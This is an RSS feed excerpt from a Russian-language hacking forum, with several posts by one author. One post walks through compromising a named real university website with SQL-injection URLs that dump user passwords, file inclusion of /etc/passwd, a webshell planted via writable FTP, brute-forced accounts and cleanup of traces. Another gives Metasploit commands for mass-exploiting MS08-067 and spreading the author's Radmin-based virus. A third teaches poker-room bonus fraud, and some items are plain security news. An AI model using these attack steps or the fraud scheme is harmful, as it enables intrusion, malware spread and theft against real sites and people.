						&lt;p&gt;//..................................&lt;/p&gt;
						&lt;p&gt;if (@$_GET[&#039;openpage&#039;])&lt;br /&gt;$file=$_GET[&#039;openpage&#039;];&lt;/p&gt;
						&lt;p&gt;if(file_exists($file))&lt;br /&gt;include($file);&lt;/p&gt;
						&lt;p&gt;else&lt;br /&gt;print (&#039;file not found&#039;);&lt;/p&gt;
						&lt;p&gt;//..............................&lt;/p&gt;
						&lt;p&gt;Он был порожден примерно таким кодом, функция file_exists, проверяет, существует ли такой файл на сервере, а затем, если существует инклудит его, таким образом, мы можем читать файлы на сервере, но нужно иметь полный путь к файлу и соответствующие права (например, файл /etc/shadow, мы не прочтем — прав не хватит).&lt;/p&gt;
						&lt;p&gt;Проверим параметры на уязвимость к sql инъекции.&lt;/p&gt;
						&lt;p&gt;&lt;a href=&quot;http://www.brgu.ru/index.php?openpage=readnews.php&amp;amp;id=227+union+select+1,2,user&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;http://www.brgu.ru/index.php?openpage=r &amp;#8230; t+1,2,user&lt;/a&gt;(),database(),version(),6,7+limit+1,1--&lt;/p&gt;
						&lt;p&gt;Версия БД - 4.1.20 значит служебной таблицы information_schema, в которой хранятся название всех таблиц и колонок не существует, прийдется гадать, но это оказалось не сложно:&lt;/p&gt;
						&lt;p&gt;&lt;a href=&quot;http://www.brgu.ru/index.php?openpage=readnews.php&amp;amp;id=227+union+select+1,2,password,database&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;http://www.brgu.ru/index.php?openpage=r &amp;#8230; d,database&lt;/a&gt;(),name,6,7+from+users+limit+1,1--&lt;/p&gt;
						&lt;p&gt;Получили доступ к таблице, в которой хранятся аккаунты пользователей форума, нашли админский. Теперь нам не придется регистрироваться, заходим под любым аккаунтом, ищем баги дальше. Форум выглядит не очень безопасным.cмотрим на копирайты, понятно форум самописный, ну что, могу спорить он весь в дырах.&lt;/p&gt;
						&lt;p&gt;Снова php – include:&lt;/p&gt;
						&lt;p&gt;&lt;a href=&quot;http://www.forum.brgu.ru/index.php?page=/etc/passwd&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;http://www.forum.brgu.ru/index.php?page=/etc/passwd&lt;/a&gt;&lt;/p&gt;
						&lt;p&gt;Пробуем оставить сообщение на форуме:&lt;/p&gt;
						&lt;p&gt;[sсriрt]аlеrt(&#039;хss&#039;)[/sсriрt]&lt;/p&gt;
						&lt;p&gt;Выдим выскочило окно с надписью xss, да и межсайтовый скриптинг при нас.&lt;/p&gt;
						&lt;p&gt;Получаем Вебшелл.&lt;/p&gt;
						&lt;p&gt;Уязвимостей тут хоть отбавляй, казалось бы при таком смертельно опасном наборе дыр, взломать сайт не составит проблем, но на самом деле мы не так уж и много имеем sql – иньекция исчерпала свой потенциал, когда отдала нам аккаунты пользователей форма, тем самым сделав бесполезным использование xss, остался только php-include, тоесть мы можем проинклудить вредоносный php скрипт, да но нужно для начала залить этот скрипт на сервер, посмотрев форум мы убедились, что залить свою аватару или вообще заливать свои файлы — возможности нет.&lt;/p&gt;
						&lt;p&gt;Уже от безнадежности сканируя порты я заметил, что тут стоит фтп сервер и есть анонимный доступ, причем папка:&lt;/p&gt;
						&lt;p&gt;&lt;a href=&quot;ftp://www.brgu.ru/pub_rw/%C4%EE%EA%F3%EC%E5%ED%F2%E0%F6%E8/&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;ftp://www.brgu.ru/pub_rw//&lt;/a&gt;&lt;/p&gt;
						&lt;p&gt;Доступна для записи!&lt;/p&gt;
						&lt;p&gt;А что если проинклудить файл с фтп? нужно попробывать!&lt;/p&gt;
						&lt;p&gt;Допустим, существует фтп сервер, но он не предоставляет всю файловую систему в наше распоряжение (если только админ не постарался этого настроить) а только отдельную директорию (такая директория называется домашней директорией фтп сервера), то есть к файлам на фтп теоретически можно обратиться и из http, только нужно знать «домашний» каталог фтп сервера, путь к нему. Примерно так я представлял себе структуру файлов на сервере (на самом деле она оказалась другой, но это не важно, главное принцип)&lt;/p&gt;
						&lt;p&gt;&lt;a href=&quot;http://www.brgu.ru/index.php?openpage=../&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;http://www.brgu.ru/index.php?openpage=../&lt;/a&gt;&lt;/p&gt;
						&lt;p&gt;Означает подняться на один каталог вверх, то есть мне не нужно искать полный путь к домашней папке фтп сервера, а достаточно, знать только название папки (если, конечно, сайт и домашняя директория фтп, находятся в одном дереве каталогов), и просто попытаться угадать&lt;/p&gt;
						&lt;p&gt;&lt;a href=&quot;http://www.brgu.ru/index.php?openpage=../ftphome&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;http://www.brgu.ru/index.php?openpage=../ftphome&lt;/a&gt;&lt;br /&gt;&lt;a href=&quot;http://www.brgu.ru/index.php?openpage=../../ftphome&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;http://www.brgu.ru/index.php?openpage=../../ftphome&lt;/a&gt;&lt;br /&gt;&lt;a href=&quot;http://www.brgu.ru/index.php?openpage=../../../ftphome&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;http://www.brgu.ru/index.php?openpage=../../../ftphome&lt;/a&gt;&lt;/p&gt;
						&lt;p&gt;И так пока не пропадет ошибка, если она пропадет, то значит, такой каталог существует, кстати, всегда, можно автоматизировать процесс...&lt;/p&gt;
						&lt;p&gt;Мне не пришлось этого делать, ибо мне улыбнулась удача!&lt;/p&gt;
						&lt;p&gt;&lt;a href=&quot;http://www.brgu.ru/index.php?openpage=../../ftp/&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;http://www.brgu.ru/index.php?openpage=../../ftp/&lt;/a&gt;&lt;/p&gt;
						&lt;p&gt;После я зашел на фтп сервер и залил на него скрипт вебшелла, а затем проинклудил его&lt;/p&gt;
						&lt;p&gt;&lt;a href=&quot;http://www.brgu.ru/index.php?openpage=../../ftp/pub_rw/%C4%EE%EA%F3%EC%E5%ED%F2%E0%F6%E8/shell.php&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;http://www.brgu.ru/index.php?openpage=../../ftp/pub_rw//shell.php&lt;/a&gt;&lt;/p&gt;
						&lt;p&gt;Теперь вернемся к /etc/passwd, здесь мы можем видеть аккаунты всех пользователей сервера, у r57, есть замечательная возможность, мы можем попробывать сбрутить более привилегированные аккаунты к фтп серверу опираясь на /etc/passwd, получаем:&lt;/p&gt;
						&lt;p&gt;ftp:ftp&lt;br /&gt;aspirantura1:aspirantura1&lt;br /&gt;profcom11:profcom11&lt;/p&gt;
						&lt;p&gt;Теперь закачаем наш шелл в другой каталог, и удалим с фтп сервера файлы, что мы заливали ранее (чтоб не палится).&lt;/p&gt;
						&lt;p&gt;Защита.&lt;/p&gt;
						&lt;p&gt;Я расскажу только о защите от php – include, поскольку, все остальные уязвимости, найденные в скриптах, не сыграли почти ни какой роли.&lt;/p&gt;
						&lt;p&gt;Самый надежный способ защититься, это создать массив, в котором будут храниться все возможные значения переменной, и проверять — если в массиве не встречается такого значения переменной, то, например, редикет на главную страницу сайта.&lt;/p&gt;
						&lt;p&gt;//..................................&lt;/p&gt;
						&lt;p&gt;$module = $_GET[&#039;module&#039;];&lt;br /&gt;$arr = array(&#039;main&#039;, &#039;about&#039;, &#039;links&#039;, &#039;forum&#039;);&lt;br /&gt;if (!in_array($module,$arr)) $module = $arr[0];&lt;br /&gt;include $module . &#039;.php&#039;;&lt;/p&gt;
						&lt;p&gt;//..............................&lt;/p&gt;
						&lt;p&gt;Вывод.&lt;/p&gt;</description>
			<author>mybb@mybb.ru (kravi4)</author>
			<pubDate>Fri, 20 Nov 2009 14:38:55 +0300</pubDate>
			<guid>http://sapog.forumbb.ru/viewtopic.php?pid=48#p48</guid>
		</item>
		<item>
			<title>The Beggining</title>
			<link>http://sapog.forumbb.ru/viewtopic.php?pid=47#p47</link>
			<description>&lt;p&gt;Если честно я относительно новичок в хакинге, но решил попробовать написать статью а возможно и серию если вам понравиться&lt;/p&gt;
						&lt;p&gt;Причина в том,что судя по другим статьям, чисто обучения нет, есть практические приёмы и секреты, по которым можно выпендреться перед друзьями взломав древний сайт с уязвимостями скриптов(есть исключения)&lt;/p&gt;
						&lt;p&gt;Но взломав этот сайт по инструкции ты не будешь понимать принципа работы уязвимости, так вот я попытаюсь составить план обучения для новичков, от a до я,кидая ссылки,давая задания, а чтобы вам не становилось скучно иногда буду про хакерские секреты и писать&lt;/p&gt;
						&lt;p&gt;Сразу скажу что хакерство это целая наука,и местами нужно учить как в школе или универе)&lt;/p&gt;
						&lt;p&gt;И так начну)&lt;/p&gt;
						&lt;p&gt;урок 1 практика&lt;br /&gt;использование ms08_067 для массрутинга и массовой заливки своего вируса(многое взял из журнала хакер, но довёл до работы).По идее у вас будет несколько дедиков, в зависимости от диапазона ip&lt;/p&gt;
						&lt;p&gt;и так, вам понадобиться:&lt;br /&gt;-metasploit framework с оф сайта&lt;br /&gt;-этот архив с исправлениями для metasploita, вирусом написанным мною и основанном на радмине, картинки процесса&lt;br /&gt;&lt;a href=&quot;http://narod.ru/disk/14499386000/The%20beggining.rar.html&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;http://narod.ru/disk/14499386000/The beggining.rar.html&lt;/a&gt;&lt;br /&gt;&lt;a href=&quot;http://letitbit.net/download/5661.5916aae45b0f86b20736b3a73/The_beggining.rar.html&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;http://letitbit.net/download/5661.5916a &amp;#8230; g.rar.html&lt;/a&gt;&lt;br /&gt;-место куда залить вирус, чтобы была прямая ссылка&lt;br /&gt;-клиент радмина с оф сайта&lt;br /&gt;вроде всё)&lt;/p&gt;
						&lt;p&gt;Приготовления:&lt;br /&gt;1)&lt;br /&gt;скачиваем &lt;br /&gt;-metasploit framework 3.2 именно 3.2&lt;br /&gt;-radmin client выше 3)&lt;br /&gt;-мой архив&lt;br /&gt;Устанавливаем метсаплоит(полную установку с nmap) и патчим его патчами из архива. инструкция внутри)Хд&lt;/p&gt;
						&lt;p&gt;2)&lt;br /&gt;ищем хостинг куда можно закинуть hz.exe(radmin)&lt;br /&gt;я у себя сервер поставил&lt;br /&gt;надо так,чтобы при нажатии на ссылку сразу закачка начиналась,так что letitbit не то)&lt;/p&gt;
						&lt;p&gt;Действия:&lt;br /&gt;1)узнаём свой внешний ip: ziz.h18.ru/ip.php мой сайт, так что юзайте на здоровье&lt;br /&gt;2)запускаем метасплоит&lt;br /&gt;на верху windows&amp;gt;console&lt;br /&gt;пишем &lt;br /&gt;load db_sqlite3 загружает библиотеку&lt;br /&gt;db_create создаёт базу данных&lt;br /&gt;db_nmap -sT -PN -PS445 -p445 87.117.180-190.* сканирует хосты на наличие открытых 445 tcp портов(не советую слишком большой диапазон брать, времени много займёт, как у меня основываясь на своём сделайте). ждём минут 5, покажется что зависло всё,но это не так)&lt;br /&gt;setg URL &lt;a href=&quot;http://172.16.1.10/hz.exe&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;http://172.16.1.10/hz.exe&lt;/a&gt; это задаст параметр который отвечает за то,откуда нагрузка скачает вирус&lt;br /&gt;db_autopwn -e -p -P windows/download_exec/bind_tcp -m ms08_067 это всё запустит, через какое то время в module output появяться шеллы, на них ip написан, на них и коннектимся радмином))))либо просто кликните на них и ручками всё сделайте)чисто фантазия уже)))&lt;/p&gt;
						&lt;p&gt;эту уязвимость использовал conficer(крупнейший botnet)&lt;/p&gt;</description>
			<author>mybb@mybb.ru (kravi4)</author>
			<pubDate>Fri, 20 Nov 2009 14:37:11 +0300</pubDate>
			<guid>http://sapog.forumbb.ru/viewtopic.php?pid=47#p47</guid>
		</item>
		<item>
			<title>Как развести покер-рум</title>
			<link>http://sapog.forumbb.ru/viewtopic.php?pid=46#p46</link>
			<description>&lt;p&gt;Статья написана для людей любого рода деятельности, но которые хотят заработать в интернете, невзирая на мошенничество :)&lt;br /&gt;(статьи писать не умею, так что если изложил не доходчиво, то нагами не пинайте, старался как мог, статья первая :) )&lt;/p&gt;
						&lt;p&gt;Здрасте.&lt;br /&gt;Я знаю способ как можно зарабатывать примерно 50$ и более в день &lt;br /&gt;(в зависимости от вашего труда) :)&lt;br /&gt;Скажу сразу что этот способ, является мошенничеством, но несмотря на это будем наказывать буржуев :) &lt;br /&gt;Даже если вас запалят, что вы играете не честно, то вам ничего не будет! Максимум заблокируют акк.&lt;/p&gt;
						&lt;p&gt;Начнём.&lt;br /&gt;Мой друг часто играет в онлайн-покер и знает кто и сколько даёт бездепозитных бонусов.&lt;br /&gt;Он наткнулся на замечательный онлайн-покер рум WolfWhitePoker, он предоставляет новым игрокам бонус в &lt;/p&gt;
						&lt;p&gt;размере 5$ сразу! Я уже не помню как и прикаких обстоятельствах мы начали изучать данный покер-рум, мы &lt;/p&gt;
						&lt;p&gt;ковырялись несколько дней и наш труд себя оправдал.&lt;/p&gt;
						&lt;p&gt;Подробнее о покер-руме.&lt;br /&gt;При регистрации (по специальной ссылке) вам сразу начисляют 5 уе. Но естественно нам было интересно по чём &lt;/p&gt;
						&lt;p&gt;именно идёт привязка, т.к. если создать 1 акк, то на второй уже бонус не приходит!&lt;br /&gt;При детальном изучении мы выяснили, что привязка идёт по ip (ну это естественно) и id винды. Т.к. ip у нас динамический, то 1 момент мы уже сразу откинули (если у вас ip статический, то юзайте прокси). &lt;br /&gt;При создании каждого нового акка вы должны менять ip и id винды!!!&lt;/p&gt;
						&lt;p&gt;Шаг 1.&lt;br /&gt;Регимся, по спец ссылке (сейчас она &lt;br /&gt;&lt;a href=&quot;https://www.whitewolfpoker.com/ru.get-started.sign-up?bonus=pokerfree5&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;https://www.whitewolfpoker.com/ru.get-s &amp;#8230; pokerfree5&lt;/a&gt;)&lt;/p&gt;
						&lt;p&gt;Шаг 2.&lt;br /&gt;сливаем деньги своему другу :) Хоче предупредить что не так всё просто, т.к. при слитии лучше играть не 1 &lt;/p&gt;
						&lt;p&gt;на 1 (ты и друг), а играть и с другими игроками, т.к. при выплате денег, они просматривают статистику &lt;/p&gt;
						&lt;p&gt;игрока, с кем он играл и т.д.&lt;/p&gt;
						&lt;p&gt;Шаг 3.&lt;br /&gt;Когда деньги слили другу, то друг пусть играет (работает на статы), а вы тем временем меняйте ip и id винды. IP меняется прокси (если не динамический), а id винды меняется пуск &amp;gt; выполнить &amp;gt; пишем regedit &amp;gt; находим HKEY_LOcAL_MACHINE &amp;gt; SOFTWARE &amp;gt; MICROSOFT &amp;gt; CURENT VERSION &amp;gt; Product ID (вот тут и меняйте)&lt;/p&gt;
						&lt;p&gt;Заметки.&lt;br /&gt;1. Ваш друг должен создать только 1 акк (на который и будут сливаться деньги) и под своими реальными данными, т.к. при выводе денег они проверяют.&lt;br /&gt;2. Ваш друг должен играть не только с вами, но и другими игроками, т.к. при выводе денег просматривается статистика игрока.&lt;br /&gt;3. Играйте на безлимитке, т.к. быстрее сливаются деньги, НО НЕ СТАВЬТЕ СРАЗУ ВСЕ ДЕНЬГИ!!! т.к. могут заподозрить в нечестной игре (курочка по зёрнышку клюёт), продумайте способ кто сколько кому будет сливать.&lt;br /&gt;4. Говорите друг другу свои карты. (Желательно общаться по скайпу, чтобы долго не писать)&lt;br /&gt;5. Данный покер-рум ещё молодой и активно следит за играми игроков.&lt;br /&gt;6. При выводе денег у вас могут попросить скан вашего паспорта.&lt;/p&gt;</description>
			<author>mybb@mybb.ru (kravi4)</author>
			<pubDate>Fri, 20 Nov 2009 14:36:09 +0300</pubDate>
			<guid>http://sapog.forumbb.ru/viewtopic.php?pid=46#p46</guid>
		</item>
		<item>
			<title>(hacking)</title>
			<link>http://sapog.forumbb.ru/viewtopic.php?pid=45#p45</link>
			<description>&lt;p&gt;Как стать участником чужого TCP соединения (hacking)&lt;br /&gt;Введение.&lt;br /&gt;Доброго времени суток. На этот раз предлагаю Вам обсудить довольно сложную тему, а именно как войти в систему не зная пароля и даже имени пользователя. Итак приступим.&lt;/p&gt;
						&lt;p&gt;Многие слышали выражения типа &amp;quot;Зателнеться по такому-то порту&amp;quot; или &amp;quot;Залей сниффер по ФТП-шнику&amp;quot; и т.п. И многие из Вас телнетились или заходили по ФТП на сервер. Ну и что там видно после соединения? Да ничего хорошего. Удаленная машина упорно талдычит &amp;quot;введи пароль&amp;quot;. Ну а где нам взять пароль, если мы впервые на этом сервере? Серьезная проблема, не так-ли? Ладно, давайте ее и решать.&lt;br /&gt;Есть предложение воспользоваться вот какой возможностью. А почему бы не переждать, пока настоящий пользователь не зарегистрируется в системе и потом не перехватить его сессию. Заманчиво, правда?&lt;br /&gt;Теория.&lt;br /&gt;Протокол TCP (Transmission Control Protocol) является одним из базовых протоколов транспортного уровня сети Internet. Работа с этим протоколом подразумевает создание непосредственного виртуального соединения, контроль ошибок, повторную пересылку поврежденных пакетов, четкую последовательность пересылки самих пакетов и разрыв соединения в конце сеанса. Нам интересен этот протокол именно потому, что такие известные протоколы прикладного уровня как FTP и TELNET реализованы на его базе. Для опознавания TCP-пакета в его заголовке существеет два 32-разрядных идентификатора, они же в свою очередь служат и счетчиками пакетов. Я имею в виду Sequence Number и Acknowledgment Number. Еще одно немаловажное поле - Control Bits.&lt;br /&gt;Это поле размером 6 бит может содержать следующие командные биты (слева направо):&lt;br /&gt;URG: Urgent Pointer field significant&lt;br /&gt;ACK: Acknowledgment field significant&lt;br /&gt;PSH: Push Function&lt;br /&gt;RST: Reset the connection&lt;br /&gt;SYN: Synchronize sequence numbers&lt;br /&gt;FIN: No more data from sender&lt;/p&gt;
						&lt;p&gt;Ну что ж, в основную теорию, надеюсь, въехали, пойдем далее. Рассмотрим как происходит процесс соединения по протоколу TCP.&lt;/p&gt;
						&lt;p&gt;Как происходит ЭТО.&lt;br /&gt;Допустим компьютеру &amp;quot;Клиент&amp;quot; (в интернете каждый компьютер умные люди зовут хостом, а чем мы хуже этих людей?) необходимо создать соединение с хостом &amp;quot;Сервер&amp;quot;. Это соединение происходит в 3 этапа:&lt;br /&gt;Первым делом клиент как бы здоровается и посылает пакет серверу с установленным битом SYN (synchronize sequence number), а в поле Sequence Number установлено начальное 32-битное значение (обозначим его как ISSкл) (Initial Sequence Number).&lt;br /&gt;Сервер тоже здоровается с клиентом (он тоже культурный) и посылает свой пакет, в котором отмечены бит SYN и бит ACK. В поле Sequence Number сервер устанавливает свое начальное значение - ISSсерв. Но это еще не все. Тут сервер начинает хитрить и в поле Acknowledgment Number ставит значение ISSкл, полученное в первом пакете от хоста &amp;quot;Клиент&amp;quot; да еще и увеличенное на единицу.&lt;br /&gt;Но клиент тоже не лыком шит и тоже отвечает хитростью: он посылает свой пакет, где установлен бит ACK; поле Sequence Number содержит ISSкл + 1, а поле Acknowledgment Number содержит значение ISSсер + 1.&lt;br /&gt;Тут процесс братания хостов и заканчивается. Виртуальное соединение считается установленным.&lt;br /&gt;Повторим схемотично, что же происходило:&lt;br /&gt;Клиент - &amp;gt; Сервер: SYN, ISSкл&lt;br /&gt;Сервер - &amp;gt; Клиент: SYN, ACK, ISSсер, ACK(ISSкл+1)&lt;br /&gt;Клиент - &amp;gt; Сервер: ACK, ISSкл+1, ACK(ISSсер+1)&lt;/p&gt;
						&lt;p&gt;Вот теперь, отрекомендовавшись у Сервера, Клиент может преспокойно отсылать свои пакеты данных, не забывая при этом менять поля ACK, ISSкл+1, ACK(ISSсер+1) и DATA.&lt;/p&gt;
						&lt;p&gt;Разбор полета.&lt;br /&gt;Из предыдущего раздела мы видим, что на этапе установки соединения (когда хосты здороваются) опознавание пакетов осуществляется только по Sequence Number и Acknowledgment Number. Тут сразу становится ясно, что для формирования ложного TCP-пакета нам достаточно знать текущие значения идентификаторов для данного соединения - ISSкл и ISSсер. Усугубляет картину еще и то, что FTP и TELNET вовсе не проверяют подлинность пакетов, полагая, что это сделает за них транспортный уровень. Отсюда вывод: внедрившись в процесс передачи данных на транспортном уровне можно послать пакет с любого хоста в сети Internet не зависимо от потокола (TELNET или FTP) от имени одного из участников данного соединения (например, от имени клиента), и данный пакет будет воспринят как верный! К тому же, постольку поскольку FTP и TELNET не проверяют IP адрес отправителя, то ответ на ложный пакет придет по указанному в нем адресу. Бедный же хозяин пакетов (Клиент) попросту отвалится из-за рассогласования счетчиков (сервер нас уже посчитал).&lt;/p&gt;
						&lt;p&gt;Дядь, дай десять копеек.&lt;br /&gt;Ну что ж осталось дело за малым. Надо рассчитать ISSкл и ISSсер, а также предсказать динамику их изменения. Это самая сложная задача, но мы трудностей не боимся. (Он сказал &amp;quot;Поехали!&amp;quot; и взмахнул рукой).&lt;/p&gt;
						&lt;p&gt;Случай 1 (простой).&lt;br /&gt;Предположим, что мы находимся в том же сегменте сети, что и атакуемый хост. Дело за малым. Ставим сниффер, направляем весь трафик через свой хост и смотрим за клиентами, подключающимися к серверу. Конечно же нас интересуют только пакеты со значениями ISSкл и ISSсер (можно даже не интересоваться содержанием поля DATA, т.е. анализировать только заголовки). Итак. Собираем информацию, ищем зависимость, составляем формулу и в путь.&lt;/p&gt;
						&lt;p&gt;Случай второй (сложный).&lt;br /&gt;Предположим, мы находимся в другом сегменте сети и проанализировать трафик нам не удастся.&lt;br /&gt;Для начала нам надо определить ISN - Initial Sequence Number, т.е. как ОС формирует начальное значение. По документации протокола TCP (RFC 793) рекомендуется увеличивать значение этого 32-битного счетчика на 1 каждые 4 микросекунды, но на практике это далеко не так. Например, в Linux 1.2.8 это значение вычисляется по такому закону:&lt;/p&gt;
						&lt;p&gt;ISN=mcsec + 1000000 sec, где mcsec - время в микросекундах;&lt;br /&gt;sec - текущее время в секундах, причем отсчет его идет от 1970 года.&lt;/p&gt;
						&lt;p&gt;в Windows NT 4.0:&lt;/p&gt;
						&lt;p&gt;ISN=10 msec, где msec - текущее время в миллисекундах.&lt;/p&gt;
						&lt;p&gt;ОК, На этом и сговоримся. Закон вычисления ISN зависит от времени и представляет функцию&lt;/p&gt;
						&lt;p&gt;ISN=F(mсsec)&lt;/p&gt;
						&lt;p&gt;Вид же самой функции F можно получить проанализировав исходный код ядра. Тут Вы сразу закричите: &amp;quot;Да ты гонишь, где же достать исходники Windows?!&amp;quot; Да, трудновато. Придется импровизировать.&lt;br /&gt;Представим ОС &amp;quot;черным яциком&amp;quot; и проведем серию тестов запрос-ответ, причем фиксируя время между запросом и ответом на него, а также время между запросами. (Проще говоря, прикинемся обезьяной с часами, и будем просить соединения у сервера, записывая изменения ISN во времени).&lt;br /&gt;В результате получится такая таблица значений&lt;/p&gt;
						&lt;p&gt;ISN(1) - T(1)&lt;/p&gt;
						&lt;p&gt;ISN(2) - T(2)&lt;/p&gt;
						&lt;p&gt;ISN(3) - T(3)&lt;/p&gt;
						&lt;p&gt;...&lt;/p&gt;
						&lt;p&gt;...&lt;/p&gt;
						&lt;p&gt;...&lt;/p&gt;
						&lt;p&gt;ISN(N) - T(N)&lt;/p&gt;
						&lt;p&gt;Здесь ISN (i) - значение ISN, полученное в момент времени i, а T(i) - время от начела эксперимента (время начала возьмем за 0).&lt;br /&gt;Проанализировав результаты наблюдений, можно составить функцию&lt;/p&gt;
						&lt;p&gt;ISN(t)=F(t)&lt;/p&gt;
						&lt;p&gt;С ее помощью уже можно получив ответ, предсказать значение ISN через определенный промежуток времени.&lt;br /&gt;Сразу оговорюсь. Не обязательно нападать с подобными тестами на интересующий нас хост. Можно просто найти такой жи тип ОС, что и там и протестировать ее, а результат (полученную функцию) записать и применить уже в деле.&lt;br /&gt;Вот, собственно, и все. Осталось дождаться, когда пользователь зарегистрируется в системе, введет логинпароль и начнет работу. Какие наши действия? Прогнозируем нимер ISN, создаем пакет с заполненными полями ACK, ISSкл+1, ACK(ISSсер+1) и DATA и, если повезет захватываем сессию. Если не повезло, немного меняем ISSкл вместе с ACK(ISSсер+1) и за старое. Рано или поздно значения будут верными. Тут нам откроются такие возможности! Этими средствами можно даже захватить сеанс полозователя root. Представить страшно.&lt;br /&gt;Вот таким далеко не простым способом можно проникнуть в любую систему. Желаю удачи!&lt;/p&gt;</description>
			<author>mybb@mybb.ru (kravi4)</author>
			<pubDate>Fri, 20 Nov 2009 14:34:31 +0300</pubDate>
			<guid>http://sapog.forumbb.ru/viewtopic.php?pid=45#p45</guid>
		</item>
		<item>
			<title>Microsoft залатала восемь &quot;дыр&quot; в своих продуктах</title>
			<link>http://sapog.forumbb.ru/viewtopic.php?pid=44#p44</link>
			<description>&lt;p&gt;10 февраля корпорация Microsoft выпустила очередную порцию обновлений для своих программных продуктов.&lt;/p&gt;
						&lt;p&gt;На этот раз опубликованы четыре бюллетеня безопасности, содержащие описание восьми &amp;quot;дыр&amp;quot;. Две уязвимости, обнаруженные в браузере Internet Explorer седьмой версии, охарактеризованы как критически опасные, а следовательно, могут использоваться злоумышленниками с целью выполнения произвольного программного кода на удаленном компьютере. Для организации атаки необходимо заманить жертву на сформированную специальным образом веб-страницу. Еще две критически опасные &amp;quot;дыры&amp;quot; устранены в почтовом сервере Microsoft Exchange. &lt;/p&gt;
						&lt;p&gt;Оставшиеся четыре уязвимости, получившие статус &amp;quot;важных&amp;quot;, тоже могут использоваться киберпреступниками с целью захвата контроля над удаленным ПК. Одна из этих &amp;quot;дыр&amp;quot; присутствует в системе управления базами данных SQL Server, три других - в пакете Visio, входящем в состав набора офисных приложений Microsoft Office. &lt;/p&gt;
						&lt;p&gt;Кроме того, корпорация Microsoft выпустила обновленную версию утилиты Malicious Software Removal Tool, содержащую процедуры для удаления вредоносного кода, при помощи которого злоумышленники могут подключать машины жертв к ботнету Srizbi.&lt;/p&gt;</description>
			<author>mybb@mybb.ru (kravi4)</author>
			<pubDate>Fri, 20 Nov 2009 14:32:10 +0300</pubDate>
			<guid>http://sapog.forumbb.ru/viewtopic.php?pid=44#p44</guid>
		</item>
		<item>
			<title>В Adobe Reader и Acrobat найдена серьезная уязвимость</title>
			<link>http://sapog.forumbb.ru/viewtopic.php?pid=43#p43</link>
			<description>&lt;p&gt;Adobe Systems предупредила пользователей программного обеспечения Adobe Reader 9 и Acrobat 9 о наличии критической уязвимости, эксплуатация которой позволяет вызвать переполнение буфера после чего атакующий злоумышленник может похитить пользовательские данные. В Adobe также отметили, что у злоумышленников уже есть эксплоиты, а образцы программ, использующих уязвимости, уже циркулируют в интернете. &amp;quot;Предыдущие версии программного обеспечения Adobe, связанного с PDF-файлами, также подвержены уязвимости и потенциально могут привести к получению контроля над компьютером пользователя&amp;quot;, - сообщили в Adobe. В связи с тем, что Adobe, как и многие другие производители программного обеспечения, выпускает патчи кумулятивными наборами в ежемесячном режиме, ожидать закрытия указанных уязвимостей можно будет лишь к 11 марта. После того, как будут закрыты уязвимости в 9-й версии, компания выпустит исправления для 7-й и 8-й версий. До тех пор производитель советует постоянно обновлять антивирусное программное обеспечение и не загружать PDF-файлы из неизвестных источников. Антивирусная компания McAfee дополняет, что сейчас об уязвимости известно немного, но уже это было достаточно, чтобы получить работающий эксплоит, как только авторы раскроют чуть больше сведений о проблеме, можно будет ожидать появления новых версий уязвимости. До 11 марта у злоумышленников времени предостаточно. Точная природа уязвимости неизвестна, но есть сведения, что во время обработки программного кода в PDF-файлах при определенном сочетании инструкций происходит переполнение памяти, отведенной под программу. После переполнения атакующий может заразить компьютер пользователя злонамеренными образцами программ и удаленно контролировать машину.&lt;/p&gt;</description>
			<author>mybb@mybb.ru (kravi4)</author>
			<pubDate>Fri, 20 Nov 2009 14:31:39 +0300</pubDate>
			<guid>http://sapog.forumbb.ru/viewtopic.php?pid=43#p43</guid>
		</item>
		<item>
			<title>В Google Docs был найден и устранен баг</title>
			<link>http://sapog.forumbb.ru/viewtopic.php?pid=42#p42</link>
			<description>&lt;p&gt;Как сообщается в официальном блоге Google Docs, из-за ошибки случайные пользователи получили доступ к ряду документов Google Docs. По словам представителей компании, &amp;quot;баг&amp;quot; был полностью исправлен на минувших выходных и затронул лишь 0,05% от общего числа документов.&lt;/p&gt;
						&lt;p&gt;Права на работу с чужими документами ошибочно раздавались лишь при комбинации определённых условий. Речь идёт о документах, на которые владелец уже раздавал права ранее, при этом &amp;quot;баг&amp;quot; проявлялся лишь тогда, когда владелец или же один из соавторов, имеющих права на раздачу доступа, отмечал в общем списке сразу несколько документов и презентаций и изменял права доступа к ним. Причем документы-таблицы эта ошибка не затронула.&lt;/p&gt;
						&lt;p&gt;Как заявила Дженнифер Мэззон, продакт-менеджер Google Docs, после исправления ошибки компания автоматически восстановила права доступа и сообщила владельцам пострадавших документов об инциденте отдельным письмом.&lt;/p&gt;
						&lt;p&gt;&amp;quot;Мы сожалеем о случившейся проблеме. Мы понимаем беспокойство наших пользователей (на самом деле жертвами ошибки стали и мы), и мы относимся к таким вопросам очень серьезно&amp;quot;, - говорится в заявлении компании.&lt;/p&gt;</description>
			<author>mybb@mybb.ru (kravi4)</author>
			<pubDate>Fri, 20 Nov 2009 14:31:00 +0300</pubDate>
			<guid>http://sapog.forumbb.ru/viewtopic.php?pid=42#p42</guid>
		</item>
		<item>
			<title>Ключевые слова для поиска уязвимых веб-страниц</title>
			<link>http://sapog.forumbb.ru/viewtopic.php?pid=41#p41</link>
